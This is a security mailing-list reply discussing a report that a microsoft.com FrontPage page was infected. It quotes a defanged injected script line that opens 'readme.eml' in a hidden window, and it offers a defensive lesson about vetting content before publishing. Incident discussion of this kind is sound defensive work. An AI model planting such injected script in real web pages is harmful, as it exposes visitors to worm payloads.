RE: Please tell me I'm wrong: microsoft.com infected

["David LeBlanc" <dleblanc () microsoft com>]

> -----Original Message-----
> From: Michael H. Warfield [mailto:mhw () wittsend com] 
 
>       Yes, indeedie do.  Just did a wget 
> http://www.microsoft.com/frontpage
> and here is what's on da 
> bottom:
 
> [html][script language="JavaScript"]window.open("readme.eml", 
> null, "resizable=no,top=6000,left=6000")[/script][/html]
 
>       Defanged by turning angle brackets into square brackets 
> even though it's not in an html attachment.  ;-)

Though you might notice that the readme.eml never made it to the web
site, so it won't actually get anyone - just good for stirring people
up.

Lesson here is that you not only have to make sure your servers are
patched, but you might want to quickly check content that other
propogate to you before you make it live 8-) 


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com